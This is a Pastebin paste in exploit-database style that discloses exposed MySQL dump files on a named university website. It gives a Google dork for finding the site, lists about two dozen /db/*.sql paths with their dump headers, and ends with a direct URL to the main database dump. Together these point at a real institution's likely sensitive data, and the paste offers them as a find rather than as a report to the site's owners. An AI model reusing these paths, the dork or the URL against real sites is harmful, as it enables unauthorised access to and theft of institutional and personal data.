API tools faq
paste
Advertisement
KingSkrupellos

Independent University of Bangladesh IUB Database Disclosure

KingSkrupellos
Mar 21st, 2019
120
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.47 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : Independent University of Bangladesh IUB Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 22/03/2019
  7. # Vendor Homepage : slass.iub.edu.bd
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Slass Independent University Bangladesh
  12. This Site is designed and maintained by CITS Web Development Team site:iub.edu.bd
  13. # Vulnerability Type :
  14. CWE-200 [ Information Exposure ]
  15. CWE-538 [ File and Directory Information Exposure ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ############################################################################################
  21.  
  22. # Impact :
  23. ***********
  24. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly
  25.  
  26. authorized to have access to that information.
  27.  
  28. * The product stores sensitive information in files or directories that are accessible to actors outside
  29.  
  30. of the intended control sphere.
  31.  
  32. ############################################################################################
  33.  
  34. # Database Disclosure Exploit and Informations :
  35. *******************************************
  36. /db/aids.sql
  37.  
  38. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  39. --
  40. -- Host: localhost Database: aids
  41. -- ------------------------------------------------------
  42. -- Server version 5.1.72-2
  43.  
  44. /db/bli_wordpress.sql
  45.  
  46. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  47. --
  48. -- Host: localhost Database: bli_wordpress
  49. -- ------------------------------------------------------
  50. -- Server version 5.1.72-2
  51.  
  52. /db/cfp.sql
  53.  
  54. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  55. --
  56. -- Host: localhost Database: cfp
  57. -- ------------------------------------------------------
  58. -- Server version 5.1.72-2
  59.  
  60. /db/cse.sql
  61.  
  62. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  63. --
  64. -- Host: localhost Database: cse
  65. -- ------------------------------------------------------
  66. -- Server version 5.1.72-2
  67.  
  68. /db/cssr.sql
  69.  
  70. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  71. --
  72. -- Host: localhost Database: cssr
  73. -- ------------------------------------------------------
  74. -- Server version 5.1.72-2
  75.  
  76. /db/eee.sql
  77.  
  78. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  79. --
  80. -- Host: localhost Database: eee
  81. -- ------------------------------------------------------
  82. -- Server version 5.1.72-2
  83.  
  84. /db/englishnew.sql
  85.  
  86. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  87. --
  88. -- Host: localhost Database: englishnew
  89. -- ------------------------------------------------------
  90. -- Server version 5.1.72-2
  91.  
  92. /db/iub.sql
  93.  
  94. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  95. --
  96. -- Host: localhost Database: iub
  97. -- ------------------------------------------------------
  98. -- Server version 5.1.72-2
  99.  
  100. /db/iubmain.sql
  101.  
  102. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  103. --
  104. -- Host: localhost Database: iubmain
  105. -- ------------------------------------------------------
  106. -- Server version 5.1.72-2
  107.  
  108. /db/jblidb.sql
  109.  
  110. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  111. --
  112. -- Host: localhost Database: jblidb
  113. -- ------------------------------------------------------
  114. -- Server version 5.1.72-2
  115.  
  116. /db/jchpddb.sql
  117.  
  118. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  119. --
  120. -- Host: localhost Database: jchpddb
  121. -- ------------------------------------------------------
  122. -- Server version 5.1.72-2
  123.  
  124. /db/jmdemdb.sql
  125.  
  126. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  127. --
  128. -- Host: localhost Database: jmdemdb
  129. -- ------------------------------------------------------
  130. -- Server version 5.1.72-2
  131.  
  132. /db/jmdosa.sql
  133.  
  134. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  135. --
  136. -- Host: localhost Database: jmdosa
  137. -- ------------------------------------------------------
  138. -- Server version 5.1.72-2
  139.  
  140. /db/jmlanguage.sql
  141.  
  142. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  143. --
  144. -- Host: localhost Database: jmlanguage
  145. -- ------------------------------------------------------
  146. -- Server version 5.1.72-2
  147.  
  148. /db/jmsemdb.sql
  149.  
  150. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  151. --
  152. -- Host: localhost Database: jmsemdb
  153. -- ------------------------------------------------------
  154. -- Server version 5.1.72-2
  155.  
  156. /db/jscgp.sql
  157.  
  158. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  159. --
  160. -- Host: localhost Database: jscgp
  161. -- ------------------------------------------------------
  162. -- Server version 5.1.72-2
  163.  
  164. /db/jsdlaw.sql
  165.  
  166. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  167. --
  168. -- Host: localhost Database: jsdlaw
  169. -- ------------------------------------------------------
  170. -- Server version 5.1.72-2
  171.  
  172. /db/jsdmcom.sql
  173.  
  174. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  175. --
  176. -- Host: localhost Database: jsdmcom
  177. -- ------------------------------------------------------
  178. -- Server version 5.1.72-2
  179.  
  180. /db/jsdsscience.sql
  181.  
  182. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  183. --
  184. -- Host: localhost Database: jsdsscience
  185. -- ------------------------------------------------------
  186. -- Server version 5.1.72-2
  187.  
  188. /db/jsenglish.sql
  189.  
  190. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  191. --
  192. -- Host: localhost Database: jsenglish
  193. -- ------------------------------------------------------
  194. -- Server version 5.1.72-2
  195.  
  196. /db/jsesmdb.sql
  197.  
  198. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  199. --
  200. -- Host: localhost Database: jsesmdb
  201. -- ------------------------------------------------------
  202. -- Server version 5.1.72-2
  203.  
  204. /db/jsesmdb.sql
  205.  
  206. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  207. --
  208. -- Host: localhost Database: jsesmdb
  209. -- ------------------------------------------------------
  210. -- Server version 5.1.72-2
  211.  
  212. /db/jslassdb.sql
  213.  
  214. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  215. --
  216. -- Host: localhost Database: jslassdb
  217. -- ------------------------------------------------------
  218. -- Server version 5.1.72-2
  219.  
  220. /db/onlineapp.sql
  221.  
  222. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  223. --
  224. -- Host: localhost Database: onlineapp
  225. -- ------------------------------------------------------
  226. -- Server version 5.1.72-2
  227.  
  228. /db/sls.sql
  229.  
  230. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  231. --
  232. -- Host: localhost Database: sls
  233. -- ------------------------------------------------------
  234. -- Server version 5.1.72-2
  235.  
  236. /db/wpdosa.sql
  237.  
  238. -- MySQL dump 10.13 Distrib 5.1.72, for debian-linux-gnu (x86_64)
  239. --
  240. -- Host: localhost Database: wpdosa
  241. -- ------------------------------------------------------
  242. -- Server version 5.1.72-2
  243.  
  244. ############################################################################################
  245.  
  246. # Example Vulnerable Site :
  247. *************************
  248. [+] slass.iub.edu.bd/db/iub.sql
  249.  
  250. ############################################################################################
  251.  
  252. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  253.  
  254. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!